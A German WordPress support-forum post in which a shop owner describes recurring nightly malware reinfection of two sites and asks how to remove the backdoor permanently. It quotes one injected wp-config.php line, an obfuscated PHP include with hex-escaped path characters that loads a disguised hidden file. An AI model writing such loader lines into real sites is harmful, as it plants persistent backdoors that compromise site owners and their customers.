Malware in Datenbank und Systemdateien – Langfristige Lösung gesucht
-
In meinem letzten erstellten Topic hatte ich einige Probleme mit meiner WordPress-Seite, unter anderem ein niemals endendes Rädchen beim Checkout im Shop. Dieses Topic konnte nun letztendlich gelöst werden, da sich herausstellte, dass sich in meinen Dateien Malware befand. So, soweit so gut.
Nun habe ich mich damals hingesetzt und in mühevollster Kleinstarbeit alle Ordner durchforstet. Alles was nicht da hin gehörte kam in die Tonne, es waren über 200 Dateien pro Seite (zwei Seiten in einer Datenbank/auf dem gleichen Server). Die ganze Suche dauerte mehr als 2 Stunden und danach lief alles wieder absolut top. Alle Plugins, Themes etc. sind geupdated, kann ja nix mehr schief gehen! Oder?
Naja, wie das halt so ist: Die Dateien kommen immer wieder. Jeden Morgen zwischen 1:00 und 3:30 Uhr werden neue Dateien geschrieben und bestehende wie die wp-config.php oder die load.php umgeschrieben und ein Befehl mit eingefügt, der sofort wieder zum stoppen des Checkouts führt. Hier ein Beispiel der Codezeilen aus der wp-config:
/*4ad01*/ $rp2s = "/var/www/vhosts/brixxysho\x70.com/schuschel.de/w\x70\x2dincludes/blocks/\x7 lost\x2dfeatured\x2dimage/.5e56ca46.ccss";$txf7 = str_repeat ($rp2s, 1) ; @include once /* 73j */ ($txf7) ; /*4ad01*/
Diese Zeilen werden nach der ersten Zeile eingefügt. Infos zum enthaltenen Link: meine Datenbank heißt „brixxyshop“, warum da „brixxysho“ steht, weiß ich nicht. „Schuschel.de“ ist die zweite Seite in der Datenbank/auf dem Server, diese ist ebenfalls mit betroffen, der Code hier stammt aus der wp-config dieser schuschel-Seite, ist aber genauso nur mit meiner Seite in meiner config jeden Morgen drin.
Und das ist auch genau der Punkt: Ich sitze nun jeden Morgen 10 Minuten in den Dateien und lösche alle Änderungen, die an dem Tag gemacht wurden, damit meine Seite für den Tag wieder läuft. Demnach meine Frage: Welche Möglichkeiten habe ich, damit ich alle Dateien tatsächlich komplett lösche und nicht immer noch eine Backdoor zum neuen erstellen jeden Tag bleibt? Gibt es ein kostenloses Programm dafür oder wie gehe ich da am besten ran?
Neu aufsetzen würde ich meine Seite ungern, da ja auch Kundendaten, Bestellungen und Produkte auf der Seite gespeichert sind, die so alle verschwinden würden.
Vielen Dank für die Unterstützung!
Patrick
- Das Thema „Malware in Datenbank und Systemdateien – Langfristige Lösung gesucht“ ist für neue Antworten geschlossen.